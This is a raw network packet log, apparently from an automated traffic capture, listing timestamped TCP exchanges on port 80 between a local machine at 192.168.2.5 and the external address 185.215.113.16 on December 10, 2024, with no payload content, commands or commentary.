Dec 10, 2024 11:11:37.116826057 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:37.116878033 CET	49914	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:37.117768049 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:37.117818117 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:37.117949009 CET	49914	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:37.118736982 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:37.118828058 CET	49914	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:37.118882895 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:37.118974924 CET	49914	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:37.119755030 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:37.119848967 CET	49914	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:37.119956970 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:37.120044947 CET	49914	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:37.121232033 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:37.121311903 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:37.121316910 CET	49914	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:37.121418953 CET	49914	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:37.122263908 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:37.122351885 CET	49914	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:37.122359991 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:37.122457027 CET	49914	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:37.123203993 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:37.123286009 CET	49914	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:37.123291969 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:37.123388052 CET	49914	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:37.124270916 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:37.124352932 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:37.124361038 CET	49914	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:37.124447107 CET	49914	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:37.125284910 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:37.125369072 CET	49914	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:37.125394106 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:37.125485897 CET	49914	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:37.126244068 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:37.126331091 CET	49914	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:37.126362085 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:37.126432896 CET	49914	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:37.127172947 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:37.127262115 CET	49914	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:37.127263069 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:37.127360106 CET	49914	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:37.128113031 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:37.128201008 CET	49914	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:37.128274918 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:37.128361940 CET	49914	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:37.128953934 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:37.129004955 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:37.129040003 CET	49914	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:37.129139900 CET	49914	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:37.129813910 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:37.129906893 CET	49914	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:37.129924059 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:37.130014896 CET	49914	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:37.130570889 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:37.130656958 CET	49914	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:37.130683899 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:37.130759954 CET	49914	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:37.131608963 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:37.131694078 CET	49914	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:37.131750107 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:37.131849051 CET	49914	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:37.132570982 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:37.132663012 CET	49914	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:37.132709026 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:37.132813931 CET	49914	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:37.133639097 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:37.133685112 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:37.133933067 CET	49914	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:37.134845972 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:37.134926081 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:37.135201931 CET	49914	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:37.135950089 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:37.137089014 CET	49914	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:37.275983095 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:37.276034117 CET	49914	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:37.276139975 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:37.276191950 CET	49914	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:37.276557922 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:37.276598930 CET	49914	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:37.276742935 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:37.276782036 CET	49914	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:37.276833057 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:37.276873112 CET	49914	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:37.277539968 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:37.277576923 CET	49914	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:37.277631044 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:37.277668953 CET	49914	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:37.278356075 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:37.278394938 CET	49914	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:37.278462887 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:37.278496027 CET	49914	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:37.279345989 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:37.279382944 CET	49914	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:37.279448986 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:37.279488087 CET	49914	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:37.280339956 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:37.280379057 CET	49914	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:37.280414104 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:37.280452013 CET	49914	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:37.281343937 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:37.281379938 CET	49914	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:37.281424999 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:37.281461000 CET	49914	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:37.282366037 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:37.282402992 CET	49914	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:37.282422066 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:37.282455921 CET	49914	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:37.283358097 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:37.283396006 CET	49914	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:37.283459902 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:37.283493042 CET	49914	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:37.284356117 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:37.284396887 CET	49914	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:37.284457922 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:37.284496069 CET	49914	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:37.285334110 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:37.285372972 CET	49914	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:37.285415888 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:37.285456896 CET	49914	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:37.286360025 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:37.286401987 CET	49914	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:37.286436081 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:37.286472082 CET	49914	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:37.287303925 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:37.287342072 CET	49914	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:37.287395000 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:37.287431955 CET	49914	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:37.288324118 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:37.288366079 CET	49914	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:37.288450956 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:37.288489103 CET	49914	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:37.289334059 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:37.289371967 CET	49914	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:37.289516926 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:37.289554119 CET	49914	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:37.290328979 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:37.290369034 CET	49914	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:37.290436983 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:37.290473938 CET	49914	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:37.291323900 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:37.291357040 CET	49914	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:37.291376114 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:37.291412115 CET	49914	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:37.292304039 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:37.292339087 CET	49914	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:37.292413950 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:37.292444944 CET	49914	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:37.293287992 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:37.293329954 CET	49914	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:37.293384075 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:37.293418884 CET	49914	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:37.294280052 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:37.294348001 CET	49914	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:37.294387102 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:37.294430017 CET	49914	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:37.295319080 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:37.295356989 CET	49914	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:37.295492887 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:37.295525074 CET	49914	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:37.296277046 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:37.296318054 CET	49914	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:37.296351910 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:37.296385050 CET	49914	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:37.297276974 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:37.297323942 CET	49914	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:37.297385931 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:37.297430992 CET	49914	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:37.298279047 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:37.298316956 CET	49914	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:37.298378944 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:37.298418045 CET	49914	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:37.299288988 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:37.299330950 CET	49914	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:37.299375057 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:37.299412012 CET	49914	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:37.300343990 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:37.300381899 CET	49914	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:37.300478935 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:37.300523996 CET	49914	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:37.301285028 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:37.301333904 CET	49914	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:37.301372051 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:37.301409960 CET	49914	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:37.302390099 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:37.302434921 CET	49914	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:37.302448034 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:37.302484989 CET	49914	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:37.303303003 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:37.303344965 CET	49914	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:37.303375006 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:37.303420067 CET	49914	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:37.304385900 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:37.304431915 CET	49914	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:37.304452896 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:37.304493904 CET	49914	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:37.305267096 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:37.305318117 CET	49914	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:37.305397987 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:37.305434942 CET	49914	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:37.306237936 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:37.306274891 CET	49914	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:37.306349993 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:37.306404114 CET	49914	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:37.307323933 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:37.307368994 CET	49914	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:37.307394981 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:37.307440042 CET	49914	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:37.308233976 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:37.308278084 CET	49914	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:37.308335066 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:37.308374882 CET	49914	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:37.309252024 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:37.309298992 CET	49914	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:37.309325933 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:37.309369087 CET	49914	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:37.310226917 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:37.310266018 CET	49914	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:37.310297012 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:37.310347080 CET	49914	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:37.311214924 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:37.311255932 CET	49914	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:37.311353922 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:37.311389923 CET	49914	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:37.312205076 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:37.312254906 CET	49914	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:37.312316895 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:37.312355042 CET	49914	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:37.313229084 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:37.313282013 CET	49914	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:37.313353062 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:37.313385010 CET	49914	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:37.314212084 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:37.314249039 CET	49914	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:37.314322948 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:37.314358950 CET	49914	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:37.315220118 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:37.315273046 CET	49914	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:37.315303087 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:37.315336943 CET	49914	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:37.316431046 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:37.316472054 CET	49914	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:37.316524982 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:37.316564083 CET	49914	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:37.317183971 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:37.317229986 CET	49914	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:37.317310095 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:37.317353010 CET	49914	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:37.318201065 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:37.318242073 CET	49914	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:37.318319082 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:37.318360090 CET	49914	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:37.319179058 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:37.319216967 CET	49914	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:37.319243908 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:37.319545984 CET	49914	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:37.320264101 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:37.320302010 CET	49914	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:37.320362091 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:37.320494890 CET	49914	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:37.321383953 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:37.321419001 CET	49914	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:37.321491003 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:37.321533918 CET	49914	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:37.322273016 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:37.322314024 CET	49914	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:37.322393894 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:37.322427988 CET	49914	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:37.323146105 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:37.323184967 CET	49914	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:37.323259115 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:37.323298931 CET	49914	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:37.324177027 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:37.324213982 CET	49914	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:37.324218988 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:37.324256897 CET	49914	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:37.325267076 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:37.325306892 CET	49914	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:37.325345993 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:37.325385094 CET	49914	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:37.326191902 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:37.326234102 CET	49914	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:37.326396942 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:37.326437950 CET	49914	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:37.328095913 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:37.328157902 CET	49914	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:37.328185081 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:37.328217983 CET	49914	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:37.523542881 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:37.523596048 CET	49914	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:37.523669004 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:37.523720980 CET	49914	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:37.523900986 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:37.523943901 CET	49914	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:37.524195910 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:37.524236917 CET	49914	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:37.524394035 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:37.524440050 CET	49914	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:37.525219917 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:37.525233030 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:37.525262117 CET	49914	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:37.525275946 CET	49914	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:37.526124001 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:37.526164055 CET	49914	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:37.526319027 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:37.526360989 CET	49914	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:37.527215958 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:37.527257919 CET	49914	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:37.527410984 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:37.527462006 CET	49914	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:37.528203011 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:37.528253078 CET	49914	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:37.528295040 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:37.528331995 CET	49914	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:37.529375076 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:37.529417992 CET	49914	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:37.529469967 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:37.529511929 CET	49914	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:37.530395985 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:37.530435085 CET	49914	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:37.530486107 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:37.530520916 CET	49914	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:37.531635046 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:37.531693935 CET	49914	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:37.531737089 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:37.531784058 CET	49914	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:37.532540083 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:37.532577991 CET	49914	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:37.532601118 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:37.532635927 CET	49914	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:37.533582926 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:37.533622980 CET	49914	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:37.533684015 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:37.533720016 CET	49914	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:37.534771919 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:37.534807920 CET	49914	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:37.534826994 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:37.534905910 CET	49914	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:37.535828114 CET	80	49914	185.215.113.16	192.168.2.5
Dec 10, 2024 11:11:37.535862923 CET	49914	80	192.168.2.5	185.215.113.16
Dec 10, 2024 11:11:37.535914898 CET	80	49914	185.215.113.16	192.168.2.5
